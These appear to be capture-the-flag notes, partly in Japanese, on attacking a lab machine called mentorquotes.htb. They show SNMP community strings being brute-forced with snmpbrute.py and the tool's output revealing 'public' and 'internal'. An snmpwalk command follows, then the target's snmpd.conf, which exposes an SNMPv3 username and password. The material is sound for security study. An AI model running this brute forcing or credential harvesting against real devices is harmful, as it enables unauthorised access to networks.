SNMP brute force community string

（内容は同じだが、複数のツールを使うことの大切さを実感）

code:snmp-brute

$ python3 snmpbrute.py -b -a -t 10.10.11.193 -f snmp-onesixtyone.txt

/usr/lib/python3/dist-packages/scapy/layers/ipsec.py:462: CryptographyDeprecationWarning: Blowfish has been deprecated

cipher=algorithms.Blowfish,

/usr/lib/python3/dist-packages/scapy/layers/ipsec.py:476: CryptographyDeprecationWarning: CAST5 has been deprecated

cipher=algorithms.CAST5,

_____ _ ____ _______ ____ __

/ ___// | / / |/ / __ \ / __ )_______ __/ /____

\__ \/ |/ / /|_/ / /_/ / / __ / ___/ / / / __/ _ \

___/ / /| / / / / ____/ / /_/ / / / /_/ / /_/ __/

/____/_/ |_/_/ /_/_/ /_____/_/ \__,_/\__/\___/

SNMP Bruteforce & Enumeration Script v2.0

###############################################################

Trying ['public', 'private', '!@#$

...,

'Zxcvbnm', 'zzz'] community strings ...

10.10.11.193 : 161 Version (v1): public

10.10.11.193 : 161 Version (v2c): public

10.10.11.193 : 161 Version (v2c): internal

Trying identified strings for READ-WRITE ...

Identified Community strings

0) 10.10.11.193 public (v1)(RO)

1) 10.10.11.193 public (v2c)(RO)

2) 10.10.11.193 internal (v2c)(RO)

Finished!

code:snmpwalk

$ snmpwalk -c internal -v 2c mentorquotes.htb

このターゲットのsnmpd.conf:

code:/etc/snmp/snmpd.conf

# Note that setting this value here means that when trying to

# perform an snmp SET operation to the sysLocation.0 variable will make

# the agent return the "notWritable" error code. IE, including

# this token in the snmpd.conf file will disable write access to

# the variable.

# arguments: location_string

sysLocation Sitting on the Dock of the Bay

sysContact Me <admin@mentorquotes.htb>

# sysservices: The proper value for the sysServices object.

# arguments: sysservices_number

sysServices 72

###########################################################################

# SECTION: Agent Operating Mode

#

# This section defines how the agent will operate when it

# is running.

# master: Should the agent operate as a master agent or not.

# Currently, the only supported master agent type for this t

# is "agentx".

#

# arguments: (on|yes|agentx|all|off|no)

master agentx

# agentaddress: The IP address and port number that the agent will listen on.

# By default the agent listens to any and all traffic from any

# interface on the default SNMP port (161). This allows you to

# specify which address, interface, transport type and port(s) that you

# want the agent to listen on. Multiple definitions of this token

# are concatenated together (using ':'s).

###########################################################################

# SECTION: Access Control Setup

#

# This section defines who is allowed to talk to your running

# snmp agent.

# Views

# system + hrSystem groups only

view systemonly included .1.3.6.1.2.1.1

view systemonly included .1.3.6.1.2.1.25.1

# rocommunity: a SNMPv1/SNMPv2c read-only access community name

# Read-only access to everyone to the systemonly view

rocommunity public default -V systemonly

rocommunity6 public default -V systemonly

# SNMPv3 doesn't use communities, but users with (optionally) an

# authentication and encryption string. This user needs to be created

# with what they can view with rouser/rwuser lines in this file.

#

# e.g.

# createuser authPrivUser SHA-512 myauthphrase AES myprivphrase

#

# This should be put into /var/lib/snmp/snmpd.conf

#

# rouser: a SNMPv3 read-only access username

rouser authPrivUser authpriv -V systemonly

# include a all *.conf files in a directory

includeDir /etc/snmp/snmpd.conf.d

createUser bootstrap MD5 SuperSecurePassword123__ DES

rouser bootstrap priv

com2sec AllUser default internal

group AllGroup v2c AllUser

view SystemView included .1.3.6.1.2.1.25.1.1

view AllView included .1

access AllGroup "" any noauth exact AllView none none